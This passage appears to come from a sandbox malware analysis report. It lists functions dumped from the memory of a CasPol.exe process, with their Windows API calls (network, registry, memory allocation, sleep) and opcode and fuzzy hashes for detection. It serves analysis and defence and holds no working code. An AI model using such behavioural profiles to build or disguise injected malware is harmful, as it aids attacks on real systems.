                                  • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1D5FA8E2
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: a4212271b923737d7d1a017e46abdabc32e0322ec4291e8f2f639b1f4b0599e9
                                  • Instruction ID: e0d962b399d06efbe84bfeb4caa169941827ac627cde9eaa6661c91c6d5485a6
                                  • Opcode Fuzzy Hash: a4212271b923737d7d1a017e46abdabc32e0322ec4291e8f2f639b1f4b0599e9
                                  • Instruction Fuzzy Hash: 88117072A002419FE710CF25D885B67FBD8EF44620F08C86ADC49CF246D675E405CB63
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E256E Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetNetworkParams.IPHLPAPI(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E25C4
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: NetworkParams
                                  • String ID:
                                  • API String ID: 2134775280-0
                                  • Opcode ID: 21a879a0ee792d44c6c4ff7f38543d1a7b6f7a59c619fead3ef030a3ab85f9e0
                                  • Instruction ID: 8afa4206f1cc6234f6f61c58ad949c5f9bafa7cc64a66e0f4ea4070c6b23d4ad
                                  • Opcode Fuzzy Hash: 21a879a0ee792d44c6c4ff7f38543d1a7b6f7a59c619fead3ef030a3ab85f9e0
                                  • Instruction Fuzzy Hash: F6010472900704AFFB218B16DD89B66FBECDF44320F18C096ED459B241D678A405CBB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E0942 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileType.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E0995
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FileType
                                  • String ID:
                                  • API String ID: 3081899298-0
                                  • Opcode ID: b38f29509b1a7ace51ddbbc0f1a1ad13f7abb81add683446c1097e957fd6f149
                                  • Instruction ID: ae0c456fd6f93a6d549d7f073d2cd6dfc1e0caa3c63e448dc2f50856a9f172fa
                                  • Opcode Fuzzy Hash: b38f29509b1a7ace51ddbbc0f1a1ad13f7abb81add683446c1097e957fd6f149
                                  • Instruction Fuzzy Hash: 2601D271A04700AFF721CF16DC89B66FBE8DF45620F18C096ED849B246D6B8A4058AB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E2ABA Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 010E2B06
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Connect
                                  • String ID:
                                  • API String ID: 3144859779-0
                                  • Opcode ID: 5338d706ed2fd8987f0448d4e58a2af3b64470e7e4d9d7599421e1c2cf4e8e49
                                  • Instruction ID: a27a9913eab6eebd76c298f3fc6d89ad39a74969145fd69aff9038c93111e7c7
                                  • Opcode Fuzzy Hash: 5338d706ed2fd8987f0448d4e58a2af3b64470e7e4d9d7599421e1c2cf4e8e49
                                  • Instruction Fuzzy Hash: 02118231904744DFEB21CF56D948B66FBE4EF04310F08C99ADD898B622D375E415DB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FAF32 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • K32GetModuleBaseNameW.KERNEL32(?,00000EA4,?,?), ref: 1D5FAF82
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: BaseModuleName
                                  • String ID:
                                  • API String ID: 595626670-0
                                  • Opcode ID: 95c2cf8a39c456d094a799680c3eaabd59669cca066ac4f1fb026a7c303d1462
                                  • Instruction ID: 49a91ac577140b751dff636d3156469820cff68a77022031ea3c3b843857cd25
                                  • Opcode Fuzzy Hash: 95c2cf8a39c456d094a799680c3eaabd59669cca066ac4f1fb026a7c303d1462
                                  • Instruction Fuzzy Hash: D301B172900200AFD314CF16CD85B26FBA8FF89A20F14815AED189B641D271F915CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E1B7E Relevance: 1.5, APIs: 1, Instructions: 47encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CertGetCertificateChain.CRYPT32(?,00000EA4,?,?), ref: 010E1BCE
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CertCertificateChain
                                  • String ID:
                                  • API String ID: 3019455780-0
                                  • Opcode ID: 3227eb0926fcfdeb73265aa7dd26cf29c950742a7b634785cba32d92d07f4667
                                  • Instruction ID: b7f67177f7bd5f7472d7e1b77d9981ab2e7516ea68525e72528c779edf630f24
                                  • Opcode Fuzzy Hash: 3227eb0926fcfdeb73265aa7dd26cf29c950742a7b634785cba32d92d07f4667
                                  • Instruction Fuzzy Hash: 3D01B172900200AFD314DF16CD85B26FBA8FF89A20F14815AED189B641D271F915CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E2426 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetTempFileNameW.KERNEL32(?,00000EA4,?,?), ref: 010E2476
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FileNameTemp
                                  • String ID:
                                  • API String ID: 745986568-0
                                  • Opcode ID: c40f4e9ff12f81f2c8b05a99238b7d15f9a1e7ec5fc537713bca791221845934
                                  • Instruction ID: 6c17482cfd5886e7d8ba3d1ec30190aaba3889897faeb724f63564869003e225
                                  • Opcode Fuzzy Hash: c40f4e9ff12f81f2c8b05a99238b7d15f9a1e7ec5fc537713bca791221845934
                                  • Instruction Fuzzy Hash: 2001D472900200AFD314DF16CD85B26FBA8FF89B20F14815AED189B741D271F915CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E4C0A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010E4C4E
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 2090b1672a0e2b3bfe4c5160c3ca7c4231b8447a4ae2d806798182ae1d3eeb2c
                                  • Instruction ID: 591bb1bea889344ecd70d87f4601fa561f14d04ee8b51823e0c7ac29ec7c719a
                                  • Opcode Fuzzy Hash: 2090b1672a0e2b3bfe4c5160c3ca7c4231b8447a4ae2d806798182ae1d3eeb2c
                                  • Instruction Fuzzy Hash: 7A01C4328007049FDB618F56DD88B16FBE0EF48310F08C49ADD898B612D372E024DF62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FB0B6 Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocExNuma.KERNEL32(?,?,?,?,?,?,C151FFB0,00000000,?,?,?,?), ref: 1D5FB0F7
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: AllocNumaVirtual
                                  • String ID:
                                  • API String ID: 4233825816-0
                                  • Opcode ID: da97a8a452de6eddc2e69c30ba692879a7a98d418905c3094cf32dd978a6e49e
                                  • Instruction ID: 20dd5ac1dcf7ddd4a27a694ae70f0592dedf25884fc682255a2c4687b61c2f0a
                                  • Opcode Fuzzy Hash: da97a8a452de6eddc2e69c30ba692879a7a98d418905c3094cf32dd978a6e49e
                                  • Instruction Fuzzy Hash: A3018031804740DFDB218F55D844B52FBE4EF44720F08C9AADD494E656D376A458DBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E4D6A Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FindWindow
                                  • String ID:
                                  • API String ID: 134000473-0
                                  • Opcode ID: e4ea85241a0d8577fbe653a72c828a247613a447edcfd29ff1964f2cea2c0d60
                                  • Instruction ID: 61e6ed1662e04815c295620a49a00a9430798e875dd03e1d20ba6499eec2b4c0
                                  • Opcode Fuzzy Hash: e4ea85241a0d8577fbe653a72c828a247613a447edcfd29ff1964f2cea2c0d60
                                  • Instruction Fuzzy Hash: 5B0188759046409FE760DF1AD889766FBD8EF44610F18C0D9DD89CB346E676E404CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FA346 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • FindCloseChangeNotification.KERNEL32(?,C151FFB0,00000000,?,?,?,?,?,?,?,?,73343C68), ref: 1D5FA378
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: ab5782300e23823b28f0830c05a5d944a92a2e708a7f9394b1689d5db885d67a
                                  • Instruction ID: 39d08844d414b5c45ff1cacdf3f6b35118634751e1ec61a3786be56f62c151c4
                                  • Opcode Fuzzy Hash: ab5782300e23823b28f0830c05a5d944a92a2e708a7f9394b1689d5db885d67a
                                  • Instruction Fuzzy Hash: 9D01F2719043809FE711CF26D884766FBD4EF44220F18C8AADC488F386D275E404CBA3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FB5C2 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • MkParseDisplayName.OLE32(?,00000EA4,?,?), ref: 1D5FB612
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: DisplayNameParse
                                  • String ID:
                                  • API String ID: 3580041360-0
                                  • Opcode ID: 38a9c963fd6da9da6e77f775e4d340fd57dfe04b619bdc7bbe7e8f2e46657e15
                                  • Instruction ID: 289cd6cfd51fda974a2fbbdd6ae0797fa9e94cfa14253de569d9e99b8c6498a3
                                  • Opcode Fuzzy Hash: 38a9c963fd6da9da6e77f775e4d340fd57dfe04b619bdc7bbe7e8f2e46657e15
                                  • Instruction Fuzzy Hash: FB016272900200AFD354DF16DD86B26FBA8FF89A20F14815AED185B741D271F915CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FA76E Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EA4,?,?), ref: 1D5FA7BE
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: a0453010a72663492523a67e222d0e2a2594c5d4c188bf560f74ce40106c8f41
                                  • Instruction ID: 6b811bbcb7f6d797c2f4d3881d7ee1d0d3617771309a25d9c566c9b3000c5968
                                  • Opcode Fuzzy Hash: a0453010a72663492523a67e222d0e2a2594c5d4c188bf560f74ce40106c8f41
                                  • Instruction Fuzzy Hash: 59016272900200AFD314DF16DD86B26FBA8FF89A20F14815AED185B741D371F915CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FAB86 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • FindCloseChangeNotification.KERNEL32(?,C151FFB0,00000000,?,?,?,?,?,?,?,?,73343C68), ref: 1D5FABB8
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: c6e62d953c15256bca1bf5f077a3b67aeb23e2b4e2b01ba744e0a97988846394
                                  • Instruction ID: 04730866dda144cfffd7a9aa0373623060a42750c9699f325575da6ea8b93f84
                                  • Opcode Fuzzy Hash: c6e62d953c15256bca1bf5f077a3b67aeb23e2b4e2b01ba744e0a97988846394
                                  • Instruction Fuzzy Hash: 1101F2719047808FE710CF2AD884753FBE4EF40620F08C4AADC498F246D2B5E448CBA3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E45A2 Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegEnumKeyExW.KERNEL32(?,00000EA4,?,?), ref: 010E45F2
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Enum
                                  • String ID:
                                  • API String ID: 2928410991-0
                                  • Opcode ID: 6967257bff904e2f8a404cab3993605a988f250bcc9a1f883d03a35f51fecfb4
                                  • Instruction ID: 134e0adb6fe88b91cce0ee7745ae1f1396ced9de7d8b4606f5e16646d70851f2
                                  • Opcode Fuzzy Hash: 6967257bff904e2f8a404cab3993605a988f250bcc9a1f883d03a35f51fecfb4
                                  • Instruction Fuzzy Hash: 44016272900200AFD354DF16DD86B26FBA8FF89A20F14815AED185B741D371F915CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E0E4E Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • setsockopt.WS2_32(?,?,?,?,?), ref: 010E0E8C
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: setsockopt
                                  • String ID:
                                  • API String ID: 3981526788-0
                                  • Opcode ID: ccaf34d9e88d66ac3d58fe2f2b9260cb1f555541c7e7e164aae631baf0d497dd
                                  • Instruction ID: 0758468e2db8c5c436e1f2f4189f5004bb6802c46c953b2b7c166e9f6af90180
                                  • Opcode Fuzzy Hash: ccaf34d9e88d66ac3d58fe2f2b9260cb1f555541c7e7e164aae631baf0d497dd
                                  • Instruction Fuzzy Hash: B4019632904740DFDB21CF55D948B56FBE0EF44320F08C4AAED894B316D3B6A454DBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E4842 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(?,C151FFB0,00000000,?,?,?,?,?,?,?,?,73343C68), ref: 010E4874
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID:
                                  • API String ID: 1890195054-0
                                  • Opcode ID: b9584ec82cc285552cd65e805d32ff251e9a0100105e0430ace42a9372cd7236
                                  • Instruction ID: 23cdb2c5fef665b9caa60cde815bcf6e8c55e40b7b08021b25ade6db11e4d7a3
                                  • Opcode Fuzzy Hash: b9584ec82cc285552cd65e805d32ff251e9a0100105e0430ace42a9372cd7236
                                  • Instruction Fuzzy Hash: 5701D4719046409FEB508F2AD989769FBD4DF40220F08C4AADD49CF242D275E404CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E0C8A Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • RasEnumConnectionsW.RASAPI32(?,00000EA4,?,?), ref: 010E0CDA
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: ConnectionsEnum
                                  • String ID:
                                  • API String ID: 3832085198-0
                                  • Opcode ID: 7f11083f72cf9773dfde24f37acebcc72ecd70f643550bdeb2d0289aafa81e04
                                  • Instruction ID: 4d4ea9e8c26b6d71f751cc0310fb4100c2dca6345b8d06db3d9bf980016c2461
                                  • Opcode Fuzzy Hash: 7f11083f72cf9773dfde24f37acebcc72ecd70f643550bdeb2d0289aafa81e04
                                  • Instruction Fuzzy Hash: A3016272900200AFD314DF16DD86B26FBA8FF89A20F14815AED185B741D271F915CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FB736 Relevance: 1.5, APIs: 1, Instructions: 39comCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: Initialize
                                  • String ID:
                                  • API String ID: 2538663250-0
                                  • Opcode ID: 4e17aaa540e1b8bbb63ad59b61f991ea5f44fafc642e7a1f26a3cf11fcbda0cb
                                  • Instruction ID: 68cb88051efb90168fd1fe3b4c94cbf15cad34a33c1a6b4679800394d5e69be9
                                  • Opcode Fuzzy Hash: 4e17aaa540e1b8bbb63ad59b61f991ea5f44fafc642e7a1f26a3cf11fcbda0cb
                                  • Instruction Fuzzy Hash: 7401D171D05680DFE710CF15D988B66FBE4EF44720F18C8AADD8C9F256D6B5A804CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FA4B6 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNEL32(?,C151FFB0,00000000,?,?,?,?,?,?,?,?,73343C68), ref: 1D5FA4E8
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 7ffd8cda6cd486dc8e357af7877119d351d4b935d2e035814cf68e8ddef405d8
                                  • Instruction ID: a890a03d14e775c84901399d51d94acfce90f16564d20306e359e13c59ee0451
                                  • Opcode Fuzzy Hash: 7ffd8cda6cd486dc8e357af7877119d351d4b935d2e035814cf68e8ddef405d8
                                  • Instruction Fuzzy Hash: 84F0C2359047409FEB20CF16D889722FBE0EF44620F18C49ADD494F356D2B9A848CFA3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20376280 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: :@zr
                                  • API String ID: 0-2777926517
                                  • Opcode ID: 4d43eb366476dd9caedc01c38e52f74c35b9eb3122ecd3e923e3e2c452bf1345
                                  • Instruction ID: 21baa1f5f11bb23071fdea61bfdff50c21257aae695d8e9b36d5ae320b239dd4
                                  • Opcode Fuzzy Hash: 4d43eb366476dd9caedc01c38e52f74c35b9eb3122ecd3e923e3e2c452bf1345
                                  • Instruction Fuzzy Hash: 96A16F70E002058FDB14EBB8C494A6DBBF2AF85324F25C529E519DB395DB39EC41CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20376264 Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: :@zr
                                  • API String ID: 0-2777926517
                                  • Opcode ID: 86ff4219f9b65e16142ae2ed56482c02fea7e0b578635951fa39af130c0aa4e3
                                  • Instruction ID: f302e2b441c7accd73494940572645fe9fa1dedfeedd2004d5f187ac19ec37a7
                                  • Opcode Fuzzy Hash: 86ff4219f9b65e16142ae2ed56482c02fea7e0b578635951fa39af130c0aa4e3
                                  • Instruction Fuzzy Hash: 32A15E70A002058FDB04DFB8C494A5DBBF2AF85324F25C569E415EB3A5DB39EC42DB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20375C08 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: :@zr
                                  • API String ID: 0-2777926517
                                  • Opcode ID: efac69bf7732e58b6b1cbf9714dbf24cade3602891fcb3b94cb0069b6b0bd9c1
                                  • Instruction ID: f6377f3319d40f375edcaba407fa70fb3967fce35e313cd077587c2aea2d2fb3
                                  • Opcode Fuzzy Hash: efac69bf7732e58b6b1cbf9714dbf24cade3602891fcb3b94cb0069b6b0bd9c1
                                  • Instruction Fuzzy Hash: BA713771B002149FCB48DFA8C494AAEFBF6BF88314B29C559E405AB355DB34ED02CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20375BF8 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: :@zr
                                  • API String ID: 0-2777926517
                                  • Opcode ID: d9a2ff63dc2a4b8485ab1370f2573f8a415726d6d8d9dcb201ae96563dcf1726
                                  • Instruction ID: 1393ca4a7df8603a49864afd5988f772668884cc3ef6f43d20f8400013b669fe
                                  • Opcode Fuzzy Hash: d9a2ff63dc2a4b8485ab1370f2573f8a415726d6d8d9dcb201ae96563dcf1726
                                  • Instruction Fuzzy Hash: D8712671B002149FCB48CFA8C484A9EBBF2FF88310B29C159E409AB355DB74ED02CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1F9C0398 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5896660516.000000001F9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1f9c0000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: :@zr
                                  • API String ID: 0-2777926517
                                  • Opcode ID: ba23ac83d0c9a06b78c3c31a6f77688c67d959f8dfacf7a13609e0b17980b754
                                  • Instruction ID: 4e2d234685323c9c4b8d210c0565075c966983ba8f36d62d04cdb8bb6b09c44a
                                  • Opcode Fuzzy Hash: ba23ac83d0c9a06b78c3c31a6f77688c67d959f8dfacf7a13609e0b17980b754
                                  • Instruction Fuzzy Hash: AC7132305043AA8FD716EB79C5C8F593BBDBB40386F40975CD8098A179DBB4194ACF92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FB142 Relevance: 1.3, APIs: 1, Instructions: 56sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNEL32(?,C151FFB0,00000000,?,?,?,?,?,?,?,?,73343C68), ref: 1D5FB1A4
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: eb59ca1c3229e9b24261ce9c24a37787e1f655feafb9920aa174bab1e00c8a2a
                                  • Instruction ID: e8b8930cf1966a93872a760c53afdf5411523ce838e5eb1b010fdbcac693be18
                                  • Opcode Fuzzy Hash: eb59ca1c3229e9b24261ce9c24a37787e1f655feafb9920aa174bab1e00c8a2a
                                  • Instruction Fuzzy Hash: A3113D714093C09FEB128F25DC54BA2BFB4DF47624F0884DAEDC58F263D2666848DB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FB172 Relevance: 1.3, APIs: 1, Instructions: 35sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNEL32(?,C151FFB0,00000000,?,?,?,?,?,?,?,?,73343C68), ref: 1D5FB1A4
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 7ffd8cda6cd486dc8e357af7877119d351d4b935d2e035814cf68e8ddef405d8
                                  • Instruction ID: 3023c7afb362407fb9319bd2894ad5e17b3291f766fbfeadbf6295aa62bce3b7
                                  • Opcode Fuzzy Hash: 7ffd8cda6cd486dc8e357af7877119d351d4b935d2e035814cf68e8ddef405d8
                                  • Instruction Fuzzy Hash: D2F0AF75904680DFE7208F15D985B66FBE0EF44620F18C49ADD484F356D6B9A808CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037C490 Relevance: .8, Instructions: 793COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
